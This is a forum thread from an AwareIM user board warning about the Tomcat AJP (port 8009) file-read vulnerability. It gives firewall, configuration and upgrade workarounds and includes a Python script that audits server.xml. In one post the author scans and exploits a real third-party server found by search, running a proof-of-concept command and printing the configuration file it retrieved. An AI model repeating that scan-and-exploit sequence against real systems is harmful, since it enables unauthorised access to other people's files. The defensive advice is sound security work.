PSA: Please secure AwareIM servers (Tomcat Vulnerability).

intra
Posts: 279
Joined: Thu Oct 11, 2012 1:30 pm
Location: Australia

PSA: Please secure AwareIM servers (Tomcat Vulnerability).

Post by intra »

In the interest of everyone's security, please make sure you take appropriate steps to secure your infrastructure.

1. Do not expose more ports than needed.
2. Make sure you keep up to date with security forums or CVE advice when they are released.
3. Where possible add more 'layers' to shield key application servers from the public internet.
4. Use non-privileged users (where possible) to avoid high-level admin rights.

The Apache Foundation has a fix which is bundled with 8.5.51, and I'm sure that AwareIM will most likely include this release after some testing and validation.

What makes this exploit bad is that if you have file upload capabilities in your app, you could write a JSP component to do remote code execution.

I'm very sorry to the person who's used in the following example:

Do a quick search on Google for a deployment.

Run a port scan:
nmap 181.x.x.x (protecting their IP as much as possible)

Examine for vulnerable port:
<Various ports open>
8009/tcp open ajp13 ****
<Various ports open>

Run Payload:
python poc.py -f "/WEB-INF/server-config.wsdd" 181.x.x.x
[2020-02-25 10:14:00.508] DEBUG Getting resource at ajp13://181.x.x.x:8009/xxxxxxxxxxxxxx
[<ajpy.ajp.AjpResponse object at 0x7f2520654c50>, <ajpy.ajp.AjpResponse object at 0x7f2520654cd0>, <ajpy.ajp.AjpResponse object at 0x7f2520654f10>]

Retrieve file out of webapp directory:
<?xml version="1.0" encoding="UTF-8"?>
<deployment xmlns="http://xml.apache.org/axis/wsdd/" xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
<globalConfiguration>
<parameter name="xxxxxxxx" value="xxxxxxx"/>
<parameter name="attachments.Directory" value="D:\jakarta-tomcat-3.3.1\webapps\axis\WEB-INF\attachments"/>
<parameter name="attachments.implementation" value="org.apache.axis.attachments.AttachmentsImpl"/>


Workarounds:

1. Block off public access at the firewall to port 8009 if you're not using it or filter it with IP access control.

2. Comment out port 8009 if you don't use it in Tomcat server.xml.

3. If you need port 8009, add a 'requiredSecret' directive in Tomcat server.xml.

4. Upgrade to version 8.5.51 of Tomcat.
Avid Linux user....
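A quick way to check workarounds 1 to 3 from the post against your own server.xml, as an added example that is not part of the original post or of AwareIM: it parses the file and flags every AJP connector that is not bound to loopback or has no shared secret. The server.xml fragment below is constructed for the demo; the attribute names requiredSecret (pre-8.5.51) and secret / secretRequired (8.5.51 and later) are the ones Tomcat itself uses.

```python
import xml.etree.ElementTree as ET

# Constructed sample server.xml (not from any real deployment): the first AJP
# connector is the old default the post warns about, the second is hardened.
SAMPLE_SERVER_XML = """
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
    <Connector port="8010" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="placeholder-change-me" />
  </Service>
</Server>
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_ajp_connectors(server_xml):
    """Return [(port, [findings]), ...] for every AJP connector found.

    An empty findings list means the connector passes all checks:
      - bound to a loopback address only (workarounds 1 and 2 in the post);
      - protected by a shared secret via 'requiredSecret' (pre-8.5.51)
        or 'secret' (8.5.51+), with secretRequired not switched off
        (workaround 3 in the post).
    """
    root = ET.fromstring(server_xml)
    results = []
    for conn in root.iter("Connector"):
        # Matches both "AJP/1.3" and the explicit org.apache.coyote.ajp.* class names.
        if "AJP" not in conn.get("protocol", "HTTP/1.1").upper():
            continue
        port = conn.get("port", "?")
        findings = []
        address = conn.get("address")
        if address not in LOOPBACK:
            findings.append(f"AJP listener bound to {address or 'all interfaces'}, not loopback")
        if not (conn.get("secret") or conn.get("requiredSecret")):
            findings.append("no shared secret configured (secret/requiredSecret missing)")
        if conn.get("secretRequired", "true").lower() == "false":
            findings.append('secretRequired="false" disables the secret check')
        results.append((port, findings))
    return results


if __name__ == "__main__":
    for port, findings in audit_ajp_connectors(SAMPLE_SERVER_XML):
        print(f"AJP connector on port {port}: {'OK' if not findings else 'REVIEW'}")
        for finding in findings:
            print(f"  - {finding}")
```

A connector that is commented out in server.xml (workaround 2) is not parsed and so produces no line at all, which is the desired outcome.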
karelh
Posts: 86
Joined: Wed Oct 26, 2016 10:20 pm

Re: PSA: Please secure AwareIM servers (Tomcat Vulnerability).

Post by karelh »

Thank you very much for your post. I think we need to spend more time on building secure AIM environments.

I have installed my AIM setup behind a WAF/Reverse Proxy and only expose the required port 443. Also, we do some IDS/IPS and other filtering on the traffic.

Thanks!
intra
Posts: 279
Joined: Thu Oct 11, 2012 1:30 pm
Location: Australia

Re: PSA: Please secure AwareIM servers (Tomcat Vulnerability).

Post by intra »

Most welcome, great to hear you're also doing reverse proxy / WAF.
Avid Linux user....